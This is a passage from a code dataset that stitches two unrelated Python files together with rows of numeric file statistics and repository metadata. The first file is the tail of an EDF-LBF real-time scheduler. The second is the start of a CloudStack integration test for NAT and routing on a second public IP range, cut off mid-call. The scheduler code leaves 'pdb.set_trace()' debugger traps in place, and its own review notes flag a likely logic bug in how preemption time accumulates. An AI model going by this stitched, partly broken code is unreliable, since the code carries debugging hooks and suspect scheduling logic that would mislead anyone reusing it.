            The task to add to the schedule
        :param ttne: type int
            A preset time-til-next-event to run the task for rather than determining from system parameters
        :return: None
        """
        # Time To Empty Budget in active queue
        ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')

        # Time to task completion
        ttc = task.c

        # Time to next preemption_point
        original_name_next_ready = task.name.split('|')[0]
        completed_comp_time = self.taskset_lookup[original_name_next_ready].c - task.c
        comp_times = [pp[0][0] - completed_comp_time - task.a for pp in
                      task.preemption_points]
        comp_times = sorted(filter(lambda time: time > 0, comp_times))

        max_proc_time = ttb
        if ttc <= max_proc_time:
            proc_time = ttc
        else:
            # Pick the largest preemption point that still fits in the budget
            proc_time = None
            for ct in comp_times:
                if max_proc_time >= ct:
                    proc_time = ct
                else:
                    break

        if proc_time is None:
            # NOTE(review): leftover debugger trap — fires when no preemption
            # point fits within the available budget.
            import pdb
            pdb.set_trace()

        # Schedule this task to run until the next scheduling decision
        if ttne is not None:
            proc_time = ttne

        # print("Scheduling {} for {}".format(task.name, proc_time))
        self.add_to_schedule(task, proc_time)

        # If the amount of time the task is run does not allow it to complete, it will be the current task at the time
        # of the next scheduling decision
        if proc_time < task.c:
            task.c -= proc_time
            self.curr_task = task
        else:
            # Task completed: release the next instance of its periodic task,
            # keeping the pending taskset sorted by (release, deadline).
            original_taskname, instance = task.name.split('|')
            instance = int(instance)
            if instance < self.instance_count[original_taskname]:
                periodic_task = self.taskset_lookup[original_taskname]
                task_instance = self.create_new_task_instance(periodic_task, instance + 1)
                self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
            self.curr_task = None
class UniResourceConsiderateFixedPointPreemptionBudgetScheduler(UniResourcePreemptionBudgetScheduler):
    """Uniprocessor EDF-LBF scheduler that preempts only at fixed preemption
    points and, at every candidate preemption, also verifies that the resources
    locked/required at those points do not conflict between the new task and
    the tasks it would preempt.

    NOTE(review): this class contains leftover ``import pdb; pdb.set_trace()``
    debugging hooks that should be removed before production use.
    """
    def schedule_tasks(self, taskset, topology=None):
        """
        Main scheduling function for uniprocessor EDF-LBF with preemption points and resources
        :param taskset: type list
            List of PeriodicTasks to schedule
        :param topology: tuple
            Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
        :return: list
            Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
        """
        original_taskset = taskset
        taskset = self.preprocess_taskset(taskset)
        self.ready_queue = PriorityQueue()
        self.active_queue = []
        self.curr_task = None
        self.schedule = []
        # First sort the taskset by activation time
        hyperperiod = get_lcm_for([t.p for t in original_taskset])
        self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
        self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
        self.taskset = self.initialize_taskset(taskset)
        self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))
        # Let time evolve and simulate scheduling, start at first task
        self.curr_time = self.taskset[0].a
        while self.taskset or not self.ready_queue.empty() or self.active_queue or self.curr_task:
            # Get all released tasks into the ready queue
            self.populate_ready_queue()
            # Only need to worry about the active tasks (if any)
            # NOTE: `or` binds looser than `and`, so this triggers when the ready
            # queue is empty OR the head of the active queue has exhausted budget.
            if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
                # NOTE(review): leftover debugging hook — a negative budget here
                # indicates an invariant violation.
                if self.active_queue and self.active_queue[0][0].k < 0:
                    import pdb
                    pdb.set_trace()
                # If there is a current task resume it
                if self.curr_task:
                    # Preempt only if an active task has run out of budget while
                    # the current task still has budget to spare.
                    preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                    if preempt:
                        self.preempt_curr_task()
                        next_active_task, time = self.active_queue.pop(0)
                        self.schedule_until_next_event(next_active_task)
                    else:
                        self.schedule_until_next_event(self.curr_task)
                # No current task, resume an active job
                elif self.active_queue:
                    next_active_task, time = self.active_queue.pop(0)
                    self.schedule_until_next_event(next_active_task)
                elif self.taskset:
                    # Nothing runnable: fast-forward to the next release time.
                    self.curr_time = self.taskset[0].a
            # We might need to introduce a new task into the active set
            else:
                p, next_ready_task = self.ready_queue.get()
                # Deadline already unreachable -> schedule is infeasible.
                if self.curr_time > next_ready_task.d - next_ready_task.c:
                    return [(taskset, None, False)]
                preempt = True
                active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
                if self.curr_task is not None:
                    active_tasks.append((self.curr_task, self.curr_time))
                active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))
                # First compute the excess budget for each task
                excess_budget = []
                cumulative_comp_time = []
                deadline_slack = []
                comp_time = 0
                for task, _ in active_tasks:
                    excess_budget.append(task.k - comp_time)
                    cumulative_comp_time.append(comp_time)
                    deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
                    comp_time += task.c
                cumulative_comp_time.append(comp_time)
                # Find the earliest place in the active task queue that can tolerate full computation of new task
                first_idx = len(excess_budget)
                for idx in range(len(excess_budget) - 1, -1, -1):
                    if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
                        break
                    else:
                        first_idx -= 1
                # new task cannot run to completion without violating budgets
                if first_idx != 0:
                    # Otherwise some tasks get violated, see if we can find a place to preempt new task into
                    earliest_idx = first_idx
                    for idx in range(first_idx, len(excess_budget)):
                        if cumulative_comp_time[idx] <= next_ready_task.k:
                            break
                        else:
                            earliest_idx += 1
                    if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
                        preempt = False
                    # We want to insert the next_ready_task into this location to respect budgets
                    min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
                    violated_idx = -1
                    max_t = min([task.k for task, _ in active_tasks])
                    for idx in range(earliest_idx - 1, -1, -1):
                        if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
                            violated_idx = idx
                        else:
                            max_t = min(max_t, excess_budget[idx], deadline_slack[idx])
                    if violated_idx != -1:
                        preempt = False
                    if max_t - min_t < 0:
                        preempt = False
                    # Candidate run lengths limited to the task's fixed preemption points
                    original_name_next_ready = next_ready_task.name.split('|')[0]
                    completed_comp_time = self.taskset_lookup[original_name_next_ready].c - next_ready_task.c
                    comp_times = [pp[0][0] - completed_comp_time - next_ready_task.a for pp in
                                  next_ready_task.preemption_points]
                    comp_times = sorted(filter(lambda time: min_t <= time <= max_t, comp_times))
                    if not comp_times:
                        preempt = False
                    else:
                        # Check what resources are currently locked by the active tasks
                        all_locked_resources = []
                        required_resume_resources = []
                        for active_task, entry_time in active_tasks:
                            original_name_active_task = active_task.name.split('|')[0]
                            completed_comp_time = self.taskset_lookup[original_name_active_task].c - active_task.c
                            filtered_points = filter(lambda pp: pp[0][1] - active_task.a == completed_comp_time,
                                                     active_task.preemption_points)
                            current_preemption_point = list(filtered_points)[0]
                            all_locked_resources += current_preemption_point[1]
                            resuming_points = [pp for pp in active_task.preemption_points
                                               if pp[0][0] - active_task.a >= completed_comp_time]
                            required_resume_resources += [r for pp in resuming_points for r in pp[2]]
                        # Check if next_ready_task has the resources it needs and leaves resources unlocked for
                        # resuming tasks
                        next_ready_task_pp = list(filter(lambda pp: pp[0][1] - next_ready_task.a == comp_times[0],
                                                         next_ready_task.preemption_points))[0]
                        next_ready_locked_resources = next_ready_task_pp[1]
                        next_ready_required_resources = next_ready_task_pp[2]
                        if set(next_ready_required_resources) & set(all_locked_resources) or \
                                set(next_ready_locked_resources) & set(required_resume_resources):
                            preempt = False
                    # If conditions satisfied preempt the task and run
                    if preempt:
                        if self.curr_task:
                            self.preempt_curr_task()
                        comp_time = comp_times[0]
                        self.schedule_until_next_event(next_ready_task, comp_time)
                        # Ran only to a preemption point: move it to the active queue.
                        if self.curr_task:
                            self.preempt_curr_task()
                            self.curr_task = None
                    # Otherwise run the current task or consume the active queue
                    else:
                        self.ready_queue.put((next_ready_task.d, next_ready_task))
                        if self.curr_task:
                            preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                            if preempt:
                                self.preempt_curr_task()
                                next_active_task, time = self.active_queue.pop(0)
                                self.schedule_until_next_event(next_active_task)
                            else:
                                self.schedule_until_next_event(self.curr_task)
                        elif self.active_queue:
                            next_active_task, time = self.active_queue.pop(0)
                            self.schedule_until_next_event(next_active_task)
                        # Nothing to run, fast forward to next release
                        elif self.taskset:
                            self.curr_time = self.taskset[0].a
                else:
                    # Check what resources are currently locked by the active tasks
                    all_locked_resources = []
                    for active_task, entry_time in active_tasks:
                        original_name_active_task = active_task.name.split('|')[0]
                        completed_comp_time = self.taskset_lookup[original_name_active_task].c - active_task.c
                        current_preemption_point = list(
                            filter(lambda pp: pp[0][1] - active_task.a == completed_comp_time,
                                   active_task.preemption_points))[0]
                        all_locked_resources += current_preemption_point[1]
                    # Check if next_ready_task has the resources it needs and leaves resources unlocked for resuming
                    # tasks
                    next_ready_task_pp = next_ready_task.preemption_points[-1]
                    next_ready_required_resources = next_ready_task_pp[2]
                    if set(next_ready_required_resources) & set(all_locked_resources):
                        preempt = False
                    if preempt:
                        if self.curr_task:
                            self.preempt_curr_task()
                        self.schedule_until_next_event(next_ready_task)
                    # Otherwise run the current task or consume the active queue
                    else:
                        self.ready_queue.put((next_ready_task.d, next_ready_task))
                        if self.curr_task:
                            preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                            if preempt:
                                self.preempt_curr_task()
                                next_active_task, time = self.active_queue.pop(0)
                                self.schedule_until_next_event(next_active_task)
                            else:
                                self.schedule_until_next_event(self.curr_task)
                        elif self.active_queue:
                            next_active_task, time = self.active_queue.pop(0)
                            self.schedule_until_next_event(next_active_task)
                        # Nothing to run, fast forward to next release
                        elif self.taskset:
                            self.curr_time = self.taskset[0].a
        # Restore the original c/k values that were consumed during simulation.
        for _, _, t in self.schedule:
            original_taskname, _ = t.name.split('|')
            t.c = self.taskset_lookup[original_taskname].c
            t.k = self.taskset_lookup[original_taskname].k
        valid = verify_budget_schedule(original_taskset, self.schedule)
        taskset = original_taskset
        return [(taskset, self.schedule, valid)]
    def schedule_until_next_event(self, task, ttne=None):
        """
        Schedules a task until the next point we should make a new scheduling decision
        :param task: type Task
            The task to add to the schedule
        :param ttne: type int
            A preset time-til-next-event to run the task for rather than determining from system parameters
        :return: None
        """
        # Time to consider next ready task / release of next task into ready queue
        if not self.ready_queue.empty():
            ttnr = 1
        elif self.taskset:
            ttnr = self.taskset[0].a - self.curr_time
        else:
            ttnr = float('inf')
        # Time To Empty Budget in active queue
        ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')
        # Time to next preemption_point
        original_name_next_ready = task.name.split('|')[0]
        completed_comp_time = self.taskset_lookup[original_name_next_ready].c - task.c
        comp_times = [pp[0][1] - completed_comp_time - task.a for pp in
                      task.preemption_points]
        comp_times = sorted(filter(lambda time: time > 0, comp_times))
        max_proc_time = ttb
        proc_time = 0
        # NOTE(review): `proc_time += ct` accumulates point offsets that already
        # look cumulative (the sibling scheduler assigns `proc_time = ct`); the
        # sum can exceed max_proc_time, which the sanity check below catches.
        # Confirm the intended semantics against the preemption_points format.
        for ct in comp_times:
            if max_proc_time >= ct:
                proc_time += ct
                if ttnr <= self.curr_time + ct:
                    break
            else:
                break
        # NOTE(review): leftover debugging hook on invariant violation.
        if proc_time is None or proc_time > max_proc_time:
            import pdb
            pdb.set_trace()
        # Schedule this task to run until the next scheduling decision
        if ttne is not None:
            proc_time = ttne
        self.add_to_schedule(task, proc_time)
        # If the amount of time the task is run does not allow it to complete, it will be the current task at the time
        # of the next scheduling decision
        if proc_time < task.c:
            task.c -= proc_time
            self.curr_task = task
        else:
            # Instance completed: release the next periodic instance, if any remain.
            original_taskname, instance = task.name.split('|')
            instance = int(instance)
            if instance < self.instance_count[original_taskname]:
                periodic_task = self.taskset_lookup[original_taskname]
                task_instance = self.create_new_task_instance(periodic_task, instance + 1)
                self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
            self.curr_task = None
| 48.385482
| 120
| 0.550285
| 4,600
| 38,660
| 4.40087
| 0.053478
| 0.034776
| 0.048903
| 0.032602
| 0.918247
| 0.912567
| 0.906639
| 0.894833
| 0.892907
| 0.888461
| 0
| 0.008679
| 0.380083
| 38,660
| 798
| 121
| 48.446115
| 0.836018
| 0.171133
| 0
| 0.893458
| 0
| 0
| 0.001051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018692
| false
| 0
| 0.016822
| 0
| 0.063551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91db55f6a6e21f30d05f690510442f2248488a06
| 54,805
|
py
|
Python
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 1
|
2020-06-17T08:53:55.000Z
|
2020-06-17T08:53:55.000Z
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 4
|
2021-09-11T01:43:33.000Z
|
2022-03-10T22:44:41.000Z
|
test/integration/component/test_multiple_public_interfaces.py
|
lujiefsi/cloudstack
|
74a7cbf753537928265c1f36afe086d69ad44e90
|
[
"Apache-2.0"
] | 1
|
2017-04-03T18:22:22.000Z
|
2017-04-03T18:22:22.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" BVT tests for network services on public IP's from different public IP
range than that of associated source NAT IP of the network. Each IP associated
with network from a different public IP range results in a new public
interface on VR (eth3, eth4 etc) and iptable
"""
# Import Local Modules
from marvin.codes import (FAILED)
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.cloudstackException import CloudstackAPIException
from marvin.cloudstackAPI import rebootRouter
from marvin.sshClient import SshClient
from marvin.lib.utils import cleanup_resources, get_process_status
from marvin.lib.base import (Account,
VirtualMachine,
ServiceOffering,
NATRule,
PublicIPAddress,
StaticNATRule,
FireWallRule,
Network,
NetworkOffering,
LoadBalancerRule,
PublicIpRange,
Router,
VpcOffering,
VPC,
NetworkACLList,
NetworkACL)
from marvin.lib.common import (get_domain,
get_zone,
get_template,
list_hosts,
list_routers)
from nose.plugins.attrib import attr
from ddt import ddt, data
# Import System modules
import socket
import time
import logging
# Tell nose's multiprocess plugin these tests may share a worker process.
_multiprocess_shared_ = True
# Module-wide logger: DEBUG level, mirrored to stderr via a stream handler.
logger = logging.getLogger('TestNetworkOps')
stream_handler = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
class TestPortForwarding(cloudstackTestCase):
    """Port forwarding on an IP acquired from a public IP range different from
    the range holding the network's source NAT IP.
    """
    @classmethod
    def setUpClass(cls):
        # One-time fixtures shared by all tests in this class: zone/domain/
        # template lookup plus an account, service offering and target VM.
        testClient = super(TestPortForwarding, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        cls.hypervisor = testClient.getHypervisorInfo()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.apiclient)
        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["zoneid"] = cls.zone.id
        template = get_template(
            cls.apiclient,
            cls.zone.id,
            cls.services["ostype"]
        )
        if template == FAILED:
            assert False, "get_template() failed to return template with description %s" % cls.services[
                "ostype"]
        # Create an account, network, VM and IP addresses
        cls.account = Account.create(
            cls.apiclient,
            cls.services["account"],
            admin=True,
            domainid=cls.domain.id
        )
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.apiclient,
            cls.services["service_offerings"]["tiny"]
        )
        cls.virtual_machine = VirtualMachine.create(
            cls.apiclient,
            cls.services["virtual_machine"],
            templateid=template.id,
            accountid=cls.account.name,
            domainid=cls.account.domainid,
            serviceofferingid=cls.service_offering.id
        )
        # Resources cleaned up once after the whole class finishes.
        cls._cleanup = [
            cls.virtual_machine,
            cls.account,
            cls.service_offering
        ]
    def setUp(self):
        # Per-test cleanup list; populated by each test as it creates resources.
        self.apiclient = self.testClient.getApiClient()
        self.cleanup = []
        return
    @classmethod
    def tearDownClass(cls):
        try:
            cls.apiclient = super(
                TestPortForwarding,
                cls).getClsTestClient().getApiClient()
            cleanup_resources(cls.apiclient, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
    def tearDown(self):
        cleanup_resources(self.apiclient, self.cleanup)
        return
    @attr(tags=["advanced", "smoke"], required_hardware="true")
    def test_port_forwarding_on_ip_from_non_src_nat_ip_range(self):
        """Test for port forwarding on a IP which is in pubic IP range different
        from public IP range that has source NAT IP associated with network
        """
        # Validate the following:
        # 1. Create a new public IP range and dedicate to a account
        # 2. Acquire a IP from new public range
        # 3. create a port forwarding on acquired IP from new range
        # 4. Create a firewall rule to open up the port
        # 5. Test SSH works to the VM
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        logger.debug("Dedicating Public IP range to the account");
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        ip_address = PublicIPAddress.create(
            self.apiclient,
            self.account.name,
            self.zone.id,
            self.account.domainid,
            self.services["virtual_machine"]
        )
        self.cleanup.append(ip_address)
        self.cleanup.append(self.public_ip_range)
        # Check if VM is in Running state before creating NAT and firewall rules
        vm_response = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            isinstance(vm_response, list),
            True,
            "Check list VM returns a valid list"
        )
        self.assertNotEqual(
            len(vm_response),
            0,
            "Check Port Forwarding Rule is created"
        )
        self.assertEqual(
            vm_response[0].state,
            'Running',
            "VM state should be Running before creating a NAT rule."
        )
        # Open up firewall port for SSH
        FireWallRule.create(
            self.apiclient,
            ipaddressid=ip_address.ipaddress.id,
            protocol=self.services["natrule"]["protocol"],
            cidrlist=['0.0.0.0/0'],
            startport=self.services["natrule"]["publicport"],
            endport=self.services["natrule"]["publicport"]
        )
        # Create PF rule
        nat_rule = NATRule.create(
            self.apiclient,
            self.virtual_machine,
            self.services["natrule"],
            ip_address.ipaddress.id
        )
        # SSH through the newly acquired IP proves the PF rule is functional.
        try:
            logger.debug("SSHing into VM with IP address %s with NAT IP %s" %
                         (
                             self.virtual_machine.ipaddress,
                             ip_address.ipaddress.ipaddress
                         ))
            self.virtual_machine.get_ssh_client(ip_address.ipaddress.ipaddress)
        except Exception as e:
            self.fail(
                "SSH Access failed for %s: %s" %
                (self.virtual_machine.ipaddress, e)
            )
        nat_rule.delete(self.apiclient)
class TestStaticNat(cloudstackTestCase):
    """Static NAT on an IP acquired from a public IP range different from the
    range holding the network's source NAT IP.
    """
    @classmethod
    def setUpClass(cls):
        # One-time fixtures: zone/domain/template lookup plus an account,
        # service offering and target VM for the static NAT rule.
        testClient = super(TestStaticNat, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        cls.hypervisor = testClient.getHypervisorInfo()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.apiclient)
        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["zoneid"] = cls.zone.id
        template = get_template(
            cls.apiclient,
            cls.zone.id,
            cls.services["ostype"]
        )
        if template == FAILED:
            assert False, "get_template() failed to return template with description %s" % cls.services[
                "ostype"]
        # Create an account, network, VM and IP addresses
        cls.account = Account.create(
            cls.apiclient,
            cls.services["account"],
            admin=True,
            domainid=cls.domain.id
        )
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.apiclient,
            cls.services["service_offerings"]["tiny"]
        )
        cls.virtual_machine = VirtualMachine.create(
            cls.apiclient,
            cls.services["virtual_machine"],
            templateid=template.id,
            accountid=cls.account.name,
            domainid=cls.account.domainid,
            serviceofferingid=cls.service_offering.id
        )
        # Network id of the VM's default NIC, needed when enabling static NAT.
        cls.defaultNetworkId = cls.virtual_machine.nic[0].networkid
        cls._cleanup = [
            cls.virtual_machine,
            cls.account,
            cls.service_offering
        ]
    def setUp(self):
        # Per-test cleanup list; populated by each test as it creates resources.
        self.apiclient = self.testClient.getApiClient()
        self.cleanup = []
        return
    @classmethod
    def tearDownClass(cls):
        try:
            cls.apiclient = super(
                TestStaticNat,
                cls).getClsTestClient().getApiClient()
            cleanup_resources(cls.apiclient, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
    def tearDown(self):
        cleanup_resources(self.apiclient, self.cleanup)
        return
    @attr(tags=["advanced", "smoke"], required_hardware="true")
    def test_static_nat_on_ip_from_non_src_nat_ip_range(self):
        """Test for static nat on a IP which is in pubic IP range different
        from public IP range that has source NAT IP associated with network
        """
        # Validate the following:
        # 1. Create a new public IP range and dedicate to a account
        # 2. Acquire a IP from new public range
        # 3. Enable static NAT on acquired IP from new range
        # 4. Create a firewall rule to open up the port
        # 5. Test SSH works to the VM
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        logger.debug("Dedicating Public IP range to the account");
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        ip_address = PublicIPAddress.create(
            self.apiclient,
            self.account.name,
            self.zone.id,
            self.account.domainid,
            self.services["virtual_machine"]
        )
        self.cleanup.append(ip_address)
        self.cleanup.append(self.public_ip_range)
        # Check if VM is in Running state before creating NAT and firewall rules
        vm_response = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            isinstance(vm_response, list),
            True,
            "Check list VM returns a valid list"
        )
        self.assertNotEqual(
            len(vm_response),
            0,
            "Check Port Forwarding Rule is created"
        )
        self.assertEqual(
            vm_response[0].state,
            'Running',
            "VM state should be Running before creating a NAT rule."
        )
        # Open up firewall port for SSH
        FireWallRule.create(
            self.apiclient,
            ipaddressid=ip_address.ipaddress.id,
            protocol=self.services["natrule"]["protocol"],
            cidrlist=['0.0.0.0/0'],
            startport=self.services["natrule"]["publicport"],
            endport=self.services["natrule"]["publicport"]
        )
        # Create Static NAT rule
        StaticNATRule.enable(
            self.apiclient,
            ip_address.ipaddress.id,
            self.virtual_machine.id,
            self.defaultNetworkId
        )
        # SSH through the newly acquired IP proves the static NAT is functional.
        try:
            logger.debug("SSHing into VM with IP address %s with NAT IP %s" %
                         (
                             self.virtual_machine.ipaddress,
                             ip_address.ipaddress.ipaddress
                         ))
            self.virtual_machine.get_ssh_client(ip_address.ipaddress.ipaddress)
        except Exception as e:
            self.fail(
                "SSH Access failed for %s: %s" %
                (self.virtual_machine.ipaddress, e)
            )
        StaticNATRule.disable(
            self.apiclient,
            ip_address.ipaddress.id,
            self.virtual_machine.id
        )
class TestRouting(cloudstackTestCase):
    """Verify VR routing tables (Table_eth3) created/removed when an IP from a
    second public IP range is associated with / disassociated from a network.
    """
    @classmethod
    def setUpClass(cls):
        # One-time fixtures: zone/domain/template lookup plus an account,
        # service offering, host SSH credentials and a VM.
        testClient = super(TestRouting, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        cls.hypervisor = testClient.getHypervisorInfo()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.apiclient)
        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["zoneid"] = cls.zone.id
        template = get_template(
            cls.apiclient,
            cls.zone.id,
            cls.services["ostype"]
        )
        if template == FAILED:
            assert False, "get_template() failed to return template with description %s" % cls.services[
                "ostype"]
        # Create an account, network, VM and IP addresses
        cls.account = Account.create(
            cls.apiclient,
            cls.services["account"],
            admin=True,
            domainid=cls.domain.id
        )
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.apiclient,
            cls.services["service_offerings"]["tiny"]
        )
        # First host entry of the marvin config; supplies SSH credentials used
        # to reach the router via its hypervisor host.
        cls.hostConfig = cls.config.__dict__["zones"][0].__dict__["pods"][0].__dict__["clusters"][0].__dict__["hosts"][0].__dict__
        cls.virtual_machine = VirtualMachine.create(
            cls.apiclient,
            cls.services["virtual_machine"],
            templateid=template.id,
            accountid=cls.account.name,
            domainid=cls.account.domainid,
            serviceofferingid=cls.service_offering.id
        )
        cls._cleanup = [
            cls.virtual_machine,
            cls.account,
            cls.service_offering
        ]
    def setUp(self):
        # Per-test cleanup list; populated by each test as it creates resources.
        self.apiclient = self.testClient.getApiClient()
        self.cleanup = []
        return
    @classmethod
    def tearDownClass(cls):
        try:
            cls.apiclient = super(
                TestRouting,
                cls).getClsTestClient().getApiClient()
            cleanup_resources(cls.apiclient, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
    def tearDown(self):
        cleanup_resources(self.apiclient, self.cleanup)
        return
    @attr(tags=["advanced", "smoke"], required_hardware="true")
    def test_routing_tables(self):
        """Test routing table in case we have IP associated with a network which is in
        different pubic IP range from that of public IP range that has source NAT IP.
        When IP is associated we should see a new route table created.
        When IP is associated we should see a that route table is deleted.
        """
        # Validate the following:
        # 1. Create a new public IP range and dedicate to a account
        # 2. Acquire a IP from new public range
        # 3. Create a firewall rule to open up the port, so that IP is associated with network
        # 5. Login to VR and verify routing tables, there should be Table_eth3
        # 6. Delete firewall rule, since its last IP, routing table Table_eth3 should be deleted
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        # NOTE(review): public_ip_range is registered for cleanup twice —
        # once here on the class-level _cleanup and again below on self.cleanup.
        self._cleanup.append(self.public_ip_range)
        logger.debug("Dedicating Public IP range to the account");
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        ip_address = PublicIPAddress.create(
            self.apiclient,
            self.account.name,
            self.zone.id,
            self.account.domainid,
            self.services["virtual_machine"]
        )
        self.cleanup.append(ip_address)
        self.cleanup.append(self.public_ip_range)
        # Check if VM is in Running state before creating NAT and firewall rules
        vm_response = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            isinstance(vm_response, list),
            True,
            "Check list VM returns a valid list"
        )
        self.assertNotEqual(
            len(vm_response),
            0,
            "Check Port Forwarding Rule is created"
        )
        self.assertEqual(
            vm_response[0].state,
            'Running',
            "VM state should be Running before creating Firewall rule."
        )
        # Open up firewall port for SSH, this will associate IP with VR
        firewall_rule = FireWallRule.create(
            self.apiclient,
            ipaddressid=ip_address.ipaddress.id,
            protocol=self.services["natrule"]["protocol"],
            cidrlist=['0.0.0.0/0'],
            startport=self.services["natrule"]["publicport"],
            endport=self.services["natrule"]["publicport"]
        )
        # Get the router details associated with account
        routers = list_routers(
            self.apiclient,
            account=self.account.name,
            domainid=self.account.domainid,
        )
        router = routers[0]
        # VMware/Hyper-V routers are reached via the management server; other
        # hypervisors are reached via the host that runs the router.
        if (self.hypervisor.lower() == 'vmware'
                or self.hypervisor.lower() == 'hyperv'):
            result = get_process_status(
                self.apiclient.connection.mgtSvr,
                22,
                self.apiclient.connection.user,
                self.apiclient.connection.passwd,
                router.linklocalip,
                'ip route list table Table_eth3',
                hypervisor=self.hypervisor
            )
        else:
            hosts = list_hosts(
                self.apiclient,
                id=router.hostid,
            )
            self.assertEqual(
                isinstance(hosts, list),
                True,
                "Check for list hosts response return valid data"
            )
            host = hosts[0]
            host.user = self.hostConfig['username']
            host.passwd = self.hostConfig['password']
            try:
                result = get_process_status(
                    host.ipaddress,
                    22,
                    host.user,
                    host.passwd,
                    router.linklocalip,
                    'ip route list table Table_eth3'
                )
            except KeyError:
                self.skipTest(
                    "Provide a marvin config file with host\
                            credentials to run %s" %
                    self._testMethodName)
        # With the IP associated, Table_eth3 must hold a default route through
        # the new range's gateway plus throw rules for other traffic.
        logger.debug("ip route list table Table_eth3: %s" % result)
        public_range_gateway = self.services["publiciprange"]["gateway"]
        default_route_rule = "default via " + public_range_gateway + " dev eth3 proto static"
        logger.debug("default route result: %s" % str(result[0]))
        self.assertEqual(
            default_route_rule,
            str(result[0]),
            "Check default route table entry for public ip range"
        )
        res = str(result)
        self.assertEqual(
            res.count("throw") == 2,
            True,
            "Check routing rules to throw rest of the traffic. Count shoule be Atleast 2 for the control and guest traffic "
        )
        # Deleting the last rule disassociates the IP; Table_eth3 must empty out.
        firewall_rule.delete(self.apiclient)
        if (self.hypervisor.lower() == 'vmware'
                or self.hypervisor.lower() == 'hyperv'):
            result = get_process_status(
                self.apiclient.connection.mgtSvr,
                22,
                self.apiclient.connection.user,
